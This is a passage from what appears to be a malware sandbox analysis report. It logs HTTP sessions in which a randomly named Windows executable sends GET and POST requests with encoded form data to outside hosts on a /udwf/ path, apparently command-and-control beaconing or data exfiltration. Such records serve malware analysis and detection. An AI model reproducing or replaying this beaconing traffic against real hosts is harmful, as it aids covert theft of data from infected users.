                                                                                                                            Data Ascii: G0Yxd2Q=kbQnce+vuQ4lECBdDixvGvnUS3qNfJWq+4DvXv7/6VwK5fL1GQuVR8Pv3SJ4qYbPj8Cuq4hTSLlyEMGrqSqVdyf6UXJfAmPh3nGRc/ZCbpWY0qdRdGMABhWc+EpYIsdI5eyq+h3Ud7H9XGvGZS1TtzseZ/6Z2IyWu1TMxGkr3umldmfzFdZJcGUKb+StLVysUbq/OA/0wxdmaIAO1v+yeoZ91ePXM3hAtIAJBXHgsYGvjOSa0tqE29MGVrOYz2whf0ybDLB/KldoeVDrJjxqopUQUkSvvYoNKnwJ9nlqBaEHs1RJju6dOEGUuqgRT3q0sRnJN98D/3Dleayy7Bu4Z1J6rW5EDTpjE7MNMqc67iJ74R10DW/m0bE6tZ/cHuVDOka47kymkobBl1t0qbPhrCJT7qJ+P/36/QNVxKe6EDster6USS/5aqIiLn3FSvIXMgaevOCB1WObhdJLYguUjL6PzKXdGwFWx57rc+fhUFtfa1Oqw+Iump2Qw3L4XFvMCteaW2ZyBeQq0PS5JschPdxKAWUOiTzvLCrGMDLPqlz93EIQKKAEhR0x5zl6EKunXR9GScOdn3w4smFl8s7LIkfxahizrrN6+r3Qm7hqP4xncWFi9WwZe2h/fxfszda+qWVUYuFQ44Fpa3ujkXpw6xPyr57/9Cz8jF+UTi+fNPBwvTDxEX7NxDSqu9PzSFQIZEetRv/PWZ7cFjPqe6/E0KrzcxA6gF93QA4d4+6vV3iRKTdbdVQGqRvHqcbW7DhkqnrHdbpky1H64KRIQ2VKAtUeHjqUhPDNO1jlwV+CpxHTp5qL4QgTqG0q4m8KWWd2CKSlLKQRBOdzP9dpaTIUk7qEeyeDmA7vaZKYW1+8J6ysd4lSL3xcu1CbR8fJs5Mq8C23rl9WPjTuL+9gYl3im+tZXRfJFAW9epjX0kF7vuaqglLVGbufGJtz2RKM+EaTJWAsuWIk/L9CXb5PHxUfb0ByVO0FzIkDiscipmM+Dr4Jox/WUjOAwOGaSDvMaA7v5KPUWDKtm+qkLLizqsxpWGoQ7ALkXjWQdIJn5WbBzonF/XxM2cNP6ADGwXqcYFisA0kU8wg+7Atf8QZOxtkTppXeV/th1eVa/vCZ65A0+/GeNRTvwNwSGR3xmBgaZ/SkRb6Lj5Iib/MSsRVVL9FLY0A5eZ3sg5NfCLpPw6OHeN6lOLaZ1nY/UjY4Uyiz
                                                                                                                            Nov 10, 2023 09:29:05.666801929 CET216INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:05 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            24192.168.2.104973991.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:09.030483961 CET217OUTGET /udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:29:09.401205063 CET218INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:29:09 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IJ6FVAJhvltVWAuToP4oL4atM71fkzPY7QYrgWTQ/RoOG0ccJaLLTy6N9einZpywHDc0RBAe9H6fep8xyV5umg==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:29:09 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-xqxcz
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 49 4a 36 46 56 41 4a 68 76 6c 74 56 57 41 75 54 6f 50 34 6f 4c 34 61 74 4d 37 31 66 6b 7a 50 59 37 51 59 72 67 57 54 51 2f 52 6f 4f 47 30 63 63 4a 61 4c 4c 54 79 36 4e 39 65 69 6e 5a 70 79 77 48 44 63 30 52 42 41 65 39 48 36 66 65 70 38 78 79 56 35 75 6d 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6f 74 74 65 72 6e 61 75 74 2e 6c 69 76 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6f 74 74 65 72 6e 61 75 74 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 74 74 65 72 6e 61 75 74 2e 6c 69 76 65 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65
                                                                                                                            Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IJ6FVAJhvltVWAuToP4oL4atM71fkzPY7QYrgWTQ/RoOG0ccJaLLTy6N9einZpywHDc0RBAe9H6fep8xyV5umg==><head><meta charset="utf-8"><title>otternaut.live&nbsp;-&nbsp;otternaut Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="otternaut.live is your first and best source for all of the information youre looking for. From gene
                                                                                                                            Nov 10, 2023 09:29:09.401220083 CET219INData Raw: 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6f 74 74 65 72 6e 61 75 74 2e 6c 69 76 65 20 68 61 73 20 69 74 20 61 6c
                                                                                                                            Data Ascii: ral topics to more of what you would expect to find here, otternaut.live has it all. We hope you find whatAEC you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
                                                                                                                            Nov 10, 2023 09:29:09.401278973 CET220INData Raw: 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 2a 7a 6f 6f 6d 3a 31 7d 61 75 64 69 6f 3a 6e 6f
                                                                                                                            Data Ascii: lay:block}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-size:100%;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}html,button,input,select,te
                                                                                                                            Nov 10, 2023 09:29:09.401290894 CET222INData Raw: 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 6c 65 67 65 6e
                                                                                                                            Data Ascii: dden}figure{margin:0}form{margin:0}fieldset{border:0 none;margin:0;padding:0}legend{border:0;padding:0;white-space:normal;*margin-left:-7px}button,input,select,textarea{font-size:100%;margin:0;vertical-align:middle;*vertical-align:middle}butto
                                                                                                                            Nov 10, 2023 09:29:09.401300907 CET223INData Raw: 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 65 6c 2c 73 61 6e
                                                                                                                            Data Ascii: th:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888}.content-disclaimer{font-size:10px}.content-disclaimer .sedologo{float:left;padding:0 10px 0 0}.content-disclaimer a:link,.cont
                                                                                                                            Nov 10, 2023 09:29:09.401314974 CET224INData Raw: 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 70 2c 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 61 30 61 30 61 30 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73
                                                                                                                            Data Ascii: -cookie-message p,#container-cookie-message a{color:#a0a0a0}#container-cookie-message p{margin-left:5%;margin-right:5%}.content-buybox{background:linear-gradient(to bottom, #666666 0%, #010101 100%);border-bottom:1px solid #ccc;word-wrap:break
                                                                                                                            Nov 10, 2023 09:29:09.401326895 CET225INData Raw: 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 30 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 68 33 7b 66 6f 6e 74 2d
                                                                                                                            Data Ascii: .webarchive-block{padding:7px 0}.content-webarchive div .webarchive-block h3{font-weight:bold}.content-webarchive div .webarchive-block h3 a:link,.content-webarchive div .webarchive-block h3 a:visited{text-decoration:none}.content-webarchive d
                                                                                                                            Nov 10, 2023 09:29:09.401427031 CET227INData Raw: 31 30 36 32 0d 0a 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 30 70 78 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20
                                                                                                                            Data Ascii: 1062r-top-left-radius:10px;border-top-right-radius:10px}.content-webarchive div .webarchive-block ul li{border-right:1px solid #ccc;border-bottom:1px solid #ccc;border-left:1px solid #ccc}.content-webarchive div .webarchive-block ul li:last-
                                                                                                                            Nov 10, 2023 09:29:09.401438951 CET228INData Raw: 63 63 7d 2e 63 6f 6e 74 65 6e 74 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 20 75 6c 20 61 3a 6c 69 6e 6b 2c 2e 63 6f 6e 74 65 6e 74 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 20 75 6c 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                            Data Ascii: cc}.content-relatedlinks ul a:link,.content-relatedlinks ul a:visited{color:#9fd801}.content-relatedlinks ul a:hover,.content-relatedlinks ul a:active,.content-relatedlinks ul a:focus{color:#e57921}.content-relatedlinks ul p{color:#c1c1c1}.con
                                                                                                                            Nov 10, 2023 09:29:09.401449919 CET229INData Raw: 69 76 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 68 33 20 61 3a 61 63 74 69 76 65 2c 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 64 69 76 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 68 33 20 61 3a
                                                                                                                            Data Ascii: iv.webarchive-block h3 a:active,.content-webarchive div div.webarchive-block h3 a:focus,.content-webarchive div div.webarchive-block h3 a:hover{color:#e57921;text-decoration:none}.content-webarchive div div.webarchive-block ul li a:link,.conte
                                                                                                                            Nov 10, 2023 09:29:09.708133936 CET231INData Raw: 2d 61 64 73 20 75 6c 20 6c 69 7b 70 61 64 64 69 6e 67 3a 2e 36 65 6d 20 30 7d 2e 63 6f 6e 74 65 6e 74 2d 61 64 73 20 75 6c 20 6c 69 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e
                                                                                                                            Data Ascii: -ads ul li{padding:.6em 0}.content-ads ul li::before{content:url("//img.sedoparking.com/templates/brick_gfx/1006/bullet_lime.gif");float:left;padding:3px 8px 0 6px}.content-ads ul li div{padding-left:35px}.content-ads ul li div h3 a{font-size:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            25192.168.2.1049740168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:15.508759022 CET248OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 54 66 50 6d 58 52 65 4c 46 69 4d 4f 79 46 48 73 64 47 74 43 58 72 56 35 6b 6f 79 66 6c 73 6d 69 6d 69 48 7a 79 49 59 5a 78 76 79 6c 6f 61 54 7a 6d 32 35 2f 6f 53 77 30 33 32 41 42 45 47 48 58 38 31 32 62 55 6a 66 33 74 44 66 49 70 73 54 4d 46 34 73 69 51 5a 4f 68 67 39 70 4f 4d 76 6d 45 65 48 59 2b 63 71 41 31 78 6b 48 34 31 75 71 62 70 77 6a 32 57 64 36 4b 73 69 61 37 41 59 6b 6a 4d 5a 45 70 7a 50 6b 37 64 36 39 67 73 66 41 42 74 33 67 62 50 75 6f 47 6b 33 55 4c 6d 6b 46 74 62 6f 6a 76 5a 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojTfPmXReLFiMOyFHsdGtCXrV5koyflsmimiHzyIYZxvyloaTzm25/oSw032ABEGHX812bUjf3tDfIpsTMF4siQZOhg9pOMvmEeHY+cqA1xkH41uqbpwj2Wd6Ksia7AYkjMZEpzPk7d69gsfABt3gbPuoGk3ULmkFtbojvZA==
                                                                                                                            Nov 10, 2023 09:29:15.864568949 CET248INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:13 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            26192.168.2.1049741168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:18.389555931 CET249OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 53 2f 66 6d 52 41 65 4c 53 53 4d 4e 39 6c 48 73 45 57 74 47 58 72 70 35 6b 74 53 50 6c 66 53 69 6d 44 33 7a 78 4b 77 5a 32 76 79 6c 69 36 54 36 72 57 35 34 6f 53 38 38 33 7a 67 42 45 47 44 58 38 31 6d 62 55 30 4c 30 69 7a 66 4f 69 4d 54 4b 59 6f 73 69 51 5a 4f 68 67 39 39 6f 4d 76 2b 45 65 32 6f 2b 64 4c 41 32 76 30 48 37 79 75 71 62 69 51 6a 79 57 64 36 34 73 6a 33 67 41 61 73 6a 4d 59 30 70 7a 64 63 38 54 4b 39 6d 6d 2f 42 77 6b 6e 46 4a 58 73 5a 2b 6c 48 38 31 34 78 52 39 65 39 50 38 65 36 44 64 43 58 75 49 73 78 74 32 35 56 5a 6e 66 36 70 74 74 6d 4d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfSimD3zxKwZ2vyli6T6rW54oS883zgBEGDX81mbU0L0izfOiMTKYosiQZOhg99oMv+Ee2o+dLA2v0H7yuqbiQjyWd64sj3gAasjMY0pzdc8TK9mm/BwknFJXsZ+lH814xR9e9P8e6DdCXuIsxt25VZnf6pttmM=
                                                                                                                            Nov 10, 2023 09:29:18.746262074 CET250INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:16 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            27192.168.2.1049742168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:21.261713982 CET252OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
